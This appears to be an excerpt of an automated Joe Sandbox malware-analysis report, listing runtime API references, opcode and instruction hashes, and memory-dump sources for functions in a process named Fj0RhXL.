                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                          • String ID: vector<T> too long
                                          • API String ID: 1785806476-3788999226
                                          • Opcode ID: f45841d72813c4dbdbcbba4e386eccb1fe6127d0bb37611a7cb8548339828f4b
                                          • Instruction ID: 8b37786200a13e673dfc445fa5c4185614bdbbad4b9abd7c47bb6b6f3704c520
                                          • Opcode Fuzzy Hash: f45841d72813c4dbdbcbba4e386eccb1fe6127d0bb37611a7cb8548339828f4b
                                          • Instruction Fuzzy Hash: 0401B5B7E602079BD705FF7EE8A586A73F8E6C1614385063AE905D7308E674B805C6F0
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D97DB4
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D97DED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                          • String ID: vector<T> too long
                                          • API String ID: 1785806476-3788999226
                                          • Opcode ID: fa0ab789c0faefd50769a7e9ead0a52b1a0e82e3f85c617b47e203f4d57f9014
                                          • Instruction ID: e9f4e849f8395176d05ab5e754d9ac8933e4e701626bb46e8aed19d26a92d213
                                          • Opcode Fuzzy Hash: fa0ab789c0faefd50769a7e9ead0a52b1a0e82e3f85c617b47e203f4d57f9014
                                          • Instruction Fuzzy Hash: 6E01D177E702039FD716FE7EE8A187A73F8E6C45253C5022BE805C7309E674A804C6A0
                                          APIs
                                          • std::_Xinvalid_argument.LIBCPMT ref: 03D8AB03
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99ACC
                                            • Part of subcall function 03D99AB7: __CxxThrowException@8.LIBCMT ref: 03D99AE1
                                            • Part of subcall function 03D99AB7: std::exception::exception.LIBCMT ref: 03D99AF2
                                          • _memmove.LIBCMT ref: 03D8AB2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                          • String ID: vector<T> too long
                                          • API String ID: 1785806476-3788999226
                                          • Opcode ID: 6b7c90d7c2013a581cfef2ef5397143ecafc2169812df78208e7132d1ca880e9
                                          • Instruction ID: f271cd957adf81d8f919d2d1ac77cf0b00d0ee441107740009738ca29d23f158
                                          • Opcode Fuzzy Hash: 6b7c90d7c2013a581cfef2ef5397143ecafc2169812df78208e7132d1ca880e9
                                          • Instruction Fuzzy Hash: 12014FB1A0020A9FDB24DFBDD895C6AB3E9EF54614718492EE45AC7744E674F900C760
                                          APIs
                                            • Part of subcall function 03D9CBE6: __getptd.LIBCMT ref: 03D9CBEC
                                            • Part of subcall function 03D9CBE6: __getptd.LIBCMT ref: 03D9CBFC
                                          • __getptd.LIBCMT ref: 03DA7032
                                            • Part of subcall function 03DA2A45: __getptd_noexit.LIBCMT ref: 03DA2A48
                                            • Part of subcall function 03DA2A45: __amsg_exit.LIBCMT ref: 03DA2A55
                                          • __getptd.LIBCMT ref: 03DA7040
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: e79c8a428b9d62cf98c6b4795c7d5392219bb901564b61f351c0f04b6a5c85e1
                                          • Instruction ID: 17e8b7e0202dbadba99ca1aa520f3e9e514a037954f0e249838e0a411d87d957
                                          • Opcode Fuzzy Hash: e79c8a428b9d62cf98c6b4795c7d5392219bb901564b61f351c0f04b6a5c85e1
                                          • Instruction Fuzzy Hash: B1016D38900F058ACF34DFBDC644AAEF3B9BF14611F58496ED4819A390CB31D5A4EB55
                                          APIs
                                          • __getptd.LIBCMT ref: 032C32B5
                                            • Part of subcall function 032B93AB: __getptd_noexit.LIBCMT ref: 032B93AE
                                            • Part of subcall function 032B93AB: __amsg_exit.LIBCMT ref: 032B93BB
                                          • __getptd.LIBCMT ref: 032C32C3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
                                          • Instruction ID: 641bb32ff3f0215c7f72760b41a138a3ffc74785e47738d34046d3b77bd9ad1e
                                          • Opcode Fuzzy Hash: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
                                          • Instruction Fuzzy Hash: BC012839834386CACF38DF64C8406ACB3B9AF04211F1C8E6DD5819B2A0CF7989C1CB91
                                          APIs
                                            • Part of subcall function 02F133BE: __getptd.LIBCMT ref: 02F133C4
                                            • Part of subcall function 02F133BE: __getptd.LIBCMT ref: 02F133D4
                                          • __getptd.LIBCMT ref: 02F138E8
                                            • Part of subcall function 02F099DE: __getptd_noexit.LIBCMT ref: 02F099E1
                                            • Part of subcall function 02F099DE: __amsg_exit.LIBCMT ref: 02F099EE
                                          • __getptd.LIBCMT ref: 02F138F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
                                          • Instruction ID: 9128ea84d71b5952d65e1857bfd8f2639f753c26f816b4a5d846b2201be8e379
                                          • Opcode Fuzzy Hash: 5ac3f6aed89f99deafff0cf3e9e67774b1ea6b5ea2ae6558ee91c8208a5f5982
                                          • Instruction Fuzzy Hash: CB01AD35C04209CBDF349F62C9A07ACB3B7AF107A0FD504AEDA889A6A4DF308581CF01
                                          APIs
                                            • Part of subcall function 6C3F71FB: __getptd.LIBCMT ref: 6C3F7201
                                            • Part of subcall function 6C3F71FB: __getptd.LIBCMT ref: 6C3F7211
                                          • __getptd.LIBCMT ref: 6C3FAD8A
                                            • Part of subcall function 6C3D9165: __getptd_noexit.LIBCMT ref: 6C3D9168
                                            • Part of subcall function 6C3D9165: __amsg_exit.LIBCMT ref: 6C3D9175
                                          • __getptd.LIBCMT ref: 6C3FAD98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                          • String ID: csm
                                          • API String ID: 803148776-1018135373
                                          • Opcode ID: 0935d24a3e66885606170b8caa28f84b00683a3f1a8be348b3a851d274276c2e
                                          • Instruction ID: 291d0543a9719f8803bddcde15e1e75bfc891738dd6efea8e466777bec322570
                                          • Opcode Fuzzy Hash: 0935d24a3e66885606170b8caa28f84b00683a3f1a8be348b3a851d274276c2e
                                          • Instruction Fuzzy Hash: 03011D358013058BCB248F61C46069EB7B5AF0431AF644D2DE8A557F90DF3295DACF62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: DecodePointer
                                          • String ID: PNv
                                          • API String ID: 3527080286-4070351811
                                          • Opcode ID: 052d82803b6134d1ba4642bf5bc32e78533162671bbd6ce74b6a736e59ff1fe6
                                          • Instruction ID: 2528a15a760772f3972762ad4324d52a1bd5f062971a1ab504bea896d38dd58c
                                          • Opcode Fuzzy Hash: 052d82803b6134d1ba4642bf5bc32e78533162671bbd6ce74b6a736e59ff1fe6
                                          • Instruction Fuzzy Hash: 3FC08C3038121029F9507BF00D26B9810188B86B0CF050821FA249CAC0EAD282150933